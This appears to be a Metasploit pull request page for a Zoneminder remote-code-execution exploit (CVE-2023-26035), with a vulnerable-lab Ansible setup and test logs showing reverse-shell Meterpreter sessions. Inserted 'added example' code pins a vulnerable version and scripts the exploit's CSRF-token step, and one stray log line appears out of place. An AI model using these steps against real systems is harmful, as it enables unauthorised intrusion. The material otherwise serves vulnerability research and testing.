Zoneminder snapshot #18434

Merged
merged 15 commits into from
Nov 10, 2023

Conversation

whotwagner (Contributor)

This PR adds an exploit module for an unauthenticated remote code execution vulnerability in Zoneminder (CVE-2023-26035).

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/webapp/zoneminder_snapshots
  • ...
  • Verify the thing does what it should
  • Verify the thing does not do what it should not
  • Document the thing and how it works (Example)

It is possible to install Zoneminder from a third-party Debian repository: https://zoneminder.readthedocs.io/en/stable/installationguide/debian.html#easy-way-debian-11-bullseye
The same repository also allows installing older Zoneminder versions on Debian Bullseye, e.g. apt install zoneminder=1.36.31-bullseye1

This commit adds an exploit module for an unauthenticated remote
code execution vulnerability in Zoneminder.
This exploit allows choosing between dropper and in-memory
payloads and works reliably.
@whotwagner whotwagner force-pushed the zoneminder-snapshot branch 3 times, most recently from 51f3289 to 84d2044 Compare October 6, 2023 22:52
@whotwagner whotwagner force-pushed the zoneminder-snapshot branch from 84d2044 to f0862d4 Compare October 6, 2023 23:02
@bwatters-r7 bwatters-r7 self-assigned this Oct 11, 2023
bwatters-r7 (Contributor)

I have tried about 6 different ways to install this product. If you use an older version of Ubuntu, as the instructions suggest, it fails because apt no longer sees the right repositories. If you use a more updated version of Linux, the MySQL configuration chokes.
If I use the Docker container, I get an empty Apache page on HTTPS, and nothing on HTTP. I tried to replicate on Debian as well and I don't remember why it failed.
If you have more definitive guidance, please list it. I'm going to pull my name off this for a while to look at other PRs, because I must be missing something here.

@bwatters-r7 bwatters-r7 removed their assignment Nov 1, 2023
whotwagner (Contributor, Author)


I installed everything with Ansible on the following Debian image: https://cloud.debian.org/images/cloud/bullseye/20210814-734/ (I used the qcow2 image). The Ansible requirements are:

roles:
  - src: https://github.com/ait-cs-IaaS/atb-ansible-zoneminder.git
    version: v1.2
    name: zoneminder
  - src: https://github.com/ait-cs-IaaS/atb-ansible-debiansnapshot.git
    version: v1.2
    name: debiansnapshot
  - src: https://github.com/ait-cs-IaaS/ansible-mariadb.git
    version: v1.0.0
    name: mariadb
  - src: https://github.com/ait-cs-IaaS/ansible-apache2.git
    version: v1.3
    name: apache2

I used the following ansible-playbook:

- name: Install old Debian-Archive-Repo Host
  hosts: all
  remote_user: debian
  become: true
  vars:
    debsnap_timestamp: 20210815T082041Z
    debsnap_debrelease: bullseye
  roles:
    - role: debiansnapshot

- name: Install Videoserver Host
  hosts: all
  remote_user: debian
  become: true
  # Ansible runs a play's roles before its tasks, so these packages are
  # installed after the roles below unless they are moved to pre_tasks.
  tasks:
    - name: Install Videoserver Packages
      ansible.builtin.apt:
        pkg:
          - vim
          - curl
          - netcat-traditional
        update_cache: yes
  roles:
    - role: mariadb
    - role: apache2
      vars:
        apache2_modules:
          - name: "headers"
          - name: "rewrite"
          - name: "expires"
          - name: "cgi"
        apache2_vhosts:
          - name: default
            http: true
            vhost_template: "redir.j2"
    - role: zoneminder
      vars:
        zoneminder_debrelease: bullseye

I also used a redirect for the apache role under templates/redir.j2:

<VirtualHost *:80>
    ServerName {{ item.name }}
{% if item.aliases is defined %}
    ServerAlias {{ item.aliases|join(' ') }}
{% endif %}
    DocumentRoot {{ apache2_vhost_dir }}/{{ item.name }}
    # Send requests for the site root to the Zoneminder web UI.
    RedirectMatch ^/$ /zm/
    ErrorLog {{ apache2_vhost_dir }}/{{ item.name }}/log/error.log
    CustomLog {{ apache2_vhost_dir }}/{{ item.name }}/log/access.log combined

    <Directory "{{ apache2_vhost_dir }}/{{ item.name }}">
        Options FollowSymLinks MultiViews
        AllowOverride All
        Require all granted
    </Directory>
</VirtualHost>

If this doesn't help I can also share a fully provisioned qcow2 image with you.
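The setup above pins the target to a frozen Debian archive state and a specific Zoneminder version. The following script is an added example and is not part of the PR or of the Ansible roles it references; it writes the two apt files that keep a lab host on a fixed snapshot and a fixed zoneminder version so a routine "apt upgrade" cannot silently move the target past the version under test. It assumes the snapshot.debian.org archive URL layout and that the zoneminder package itself comes from a repository already configured on the host (the zmrepo sources line is not reproduced here).

```shell
#!/bin/sh
# Added example (not from the PR or the ansible roles it references): write the
# apt configuration for a reproducible, version-pinned Zoneminder lab host.
# Assumptions: snapshot.debian.org URL layout; the zoneminder package source
# is configured separately on the host.
set -eu

# Sources line for a frozen Debian archive state. Snapshot Release files are
# long expired, so apt must be told not to enforce Valid-Until on this source.
snapshot_sources_line() {
  stamp="$1"; release="$2"
  printf 'deb [check-valid-until=no] https://snapshot.debian.org/archive/debian/%s/ %s main\n' "$stamp" "$release"
}

# Pin stanza: a priority above 1000 makes apt keep (or downgrade to) exactly
# this version even when the repository offers a newer, patched one.
zoneminder_pin_stanza() {
  version="$1"
  printf 'Package: zoneminder\nPin: version %s\nPin-Priority: 1001\n' "$version"
}

# Write both files under an apt root (default /etc/apt). Passing another root
# lets you inspect the generated files without touching the host.
write_lab_apt_config() {
  stamp="$1"; release="$2"; version="$3"; root="${4:-/etc/apt}"
  mkdir -p "$root/sources.list.d" "$root/preferences.d"
  snapshot_sources_line "$stamp" "$release" > "$root/sources.list.d/snapshot.list"
  zoneminder_pin_stanza "$version" > "$root/preferences.d/zoneminder.pref"
  echo "$root/sources.list.d/snapshot.list $root/preferences.d/zoneminder.pref"
}

# Check helper: given the text of "apt-cache policy zoneminder", succeed only
# when the candidate version is the pinned one (run after "apt-get update").
candidate_matches() {
  expected="$1"; policy_output="$2"
  printf '%s\n' "$policy_output" | grep -q "^ *Candidate: $expected\$"
}

# Apply on a real host: sh this_script.sh --apply
if [ "${1:-}" = "--apply" ]; then
  write_lab_apt_config 20210815T082041Z bullseye 1.36.31-bullseye1
  apt-get update
  candidate_matches 1.36.31-bullseye1 "$(apt-cache policy zoneminder)" \
    || { echo "pinned version is not the candidate; check the zoneminder repository" >&2; exit 1; }
  apt-get install -y --allow-downgrades zoneminder=1.36.31-bullseye1
fi
```

The candidate check is the part worth keeping: if the zoneminder repository does not carry the pinned version, apt reports a different candidate and the install would either fail or pull a patched build, so the script stops before touching packages.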

@jheysel-r7 jheysel-r7 self-assigned this Nov 8, 2023
jheysel-r7 (Contributor)


Hey @whotwagner, if you could email a copy of the fully provisioned qcow2 image to [email protected], that would be super useful! Thanks in advance.

jheysel-r7 (Contributor) left a comment

Thanks for the great module @whotwagner, also for emailing the target image over to us, that was a big help.

I've just made a couple of suggestions with regards to rescuing connection errors, but other than that the module looks good. Testing was as expected for both targets:

nix Command:

ENCTYPE: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)

msf6 exploit(unix/webapp/zoneminder_snapshots) > set rhosts 192.168.65.2
rhosts => 192.168.65.2
msf6 exploit(unix/webapp/zoneminder_snapshots) > set lhost 192.168.65.1
lhost => 192.168.65.1
msf6 exploit(unix/webapp/zoneminder_snapshots) > run

[*] Started reverse TCP handler on 192.168.65.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Elapsed time: 19.59511300001759 seconds.
[+] The target is vulnerable.
[*] Fetching CSRF Token
[+] Got Token: key:2027e86be06af584f16f789d714528235a3643af,1699561583
[*] Executing nix Command for cmd/linux/http/x64/meterpreter/reverse_tcp
[*] Sending payload
[*] Sending stage (3045380 bytes) to 192.168.65.2
[*] Meterpreter session 1 opened (192.168.65.1:4444 -> 192.168.65.2:36000) at 2023-11-09 15:26:25 -0500
[+] Payload sent

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : atb-videoserver-image-2023-10-22t08-35-06z.novalocal
OS           : Debian 11.0 (Linux 5.10.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > bg

Linux (Dropper):

msf6 exploit(unix/webapp/zoneminder_snapshots) > set target 1
target => 1
msf6 exploit(unix/webapp/zoneminder_snapshots) > run

[*] Started reverse TCP handler on 192.168.65.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Elapsed time: 13.220129999972414 seconds.
[+] The target is vulnerable.
[*] Fetching CSRF Token
[+] Got Token: key:997a66a9dd7d6203744b0f3454f2b5b543787698,1699561825
[*] Executing Linux (Dropper) for linux/x64/meterpreter/reverse_tcp
[*] Sending payload
[*] Sending stage (3045380 bytes) to 192.168.65.2
[*] Meterpreter session 2 opened (192.168.65.1:4444 -> 192.168.65.2:36002) at 2023-11-09 15:30:26 -0500
[+] Payload sent
[*] Command Stager progress - 100.00% done (823/823 bytes)

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : atb-videoserver-image-2023-10-22t08-35-06z.novalocal
OS           : Debian 11.0 (Linux 5.10.0-8-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > back

I'll land this once the docs file is updated with the ansible yaml files 👍
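The test log above shows the module's sequence: probe the host, fetch a CSRF token of the form key:<40 hex>,<unix time>, then send the payload; the review asks for connection errors to be rescued along the way. The following is an added example and not code from the zoneminder_snapshots module: it reproduces the probe-and-token steps in plain Ruby with Net::HTTP so it runs without the Metasploit framework, and shows how connection failures get mapped to an "unreachable" result rather than crashing or being reported as "not vulnerable". It assumes the token appears verbatim in the fetched page; the module's actual request path and parameters are not shown on this page and are not reproduced here.

```ruby
# Added example, not code from the zoneminder_snapshots module: the
# "probe the host, then pull the CSRF token" steps that the test log shows,
# written with plain Net::HTTP so it runs without Metasploit.
# Assumption: the token appears verbatim in the HTML of the fetched page.
require 'net/http'
require 'openssl'
require 'uri'

# Token shape as printed by the module: "key:" + 40 hex chars + "," + unix time.
TOKEN_RE = /key:[0-9a-f]{40},\d{9,10}/

# Everything that means "could not talk to the target", as opposed to
# "target answered and is not vulnerable". A check method should map these
# to an unknown result instead of raising or reporting the host as safe.
CONNECTION_ERRORS = [
  Errno::ECONNREFUSED, Errno::ECONNRESET, Errno::EHOSTUNREACH, Errno::ENETUNREACH,
  Errno::ETIMEDOUT, SocketError, Net::OpenTimeout, Net::ReadTimeout,
  OpenSSL::SSL::SSLError, IOError
].freeze

# Returns the first token found in the body, or nil.
def extract_token(body)
  body.to_s[TOKEN_RE]
end

# fetcher: a callable returning [status_code, body] or raising one of the
# errors above. Separating the transport makes the rescue path testable offline.
def fetch_csrf_token(fetcher)
  status, body = fetcher.call
  return { state: :http_error, status: status } unless status == 200

  token = extract_token(body)
  return { state: :no_token } unless token

  # The trailing field is the issue time; useful when reasoning about token age.
  issued_at = Time.at(token.split(',').last.to_i).utc
  { state: :ok, token: token, issued_at: issued_at }
rescue *CONNECTION_ERRORS => e
  { state: :unreachable, error: e.class.name }
end

# Real transport: a single GET with explicit timeouts so a silent host
# cannot stall the check indefinitely.
def http_fetcher(uri, open_timeout: 5, read_timeout: 10)
  lambda do
    res = Net::HTTP.start(uri.host, uri.port,
                          use_ssl: uri.scheme == 'https',
                          open_timeout: open_timeout,
                          read_timeout: read_timeout) do |http|
      http.get(uri.request_uri)
    end
    [res.code.to_i, res.body]
  end
end

# Constructed sample page carrying a token of the logged shape (the hidden
# field name "token" is made up for this example).
SAMPLE_BODY = <<~HTML
  <html><body><form method="post">
    <input type="hidden" name="token" value="key:2027e86be06af584f16f789d714528235a3643af,1699561583" />
  </form></body></html>
HTML

# Usage: ruby <this file> http://target/zm/
if __FILE__ == $PROGRAM_NAME && ARGV[0]
  puts fetch_csrf_token(http_fetcher(URI(ARGV[0]))).inspect
end
```

The three-way split matters for a check method: :unreachable corresponds to an unknown result (the scan could not decide), :no_token and :http_error mean the host answered but did not look like the expected application, and only :ok moves on to the payload step.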

@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Nov 10, 2023
@jheysel-r7 jheysel-r7 merged commit 1da4333 into rapid7:master Nov 10, 2023
jheysel-r7 (Contributor) commented Nov 10, 2023

Release Notes

This PR adds an exploit module for an unauthenticated remote code execution vulnerability in the video surveillance software Zoneminder (CVE-2023-26035).
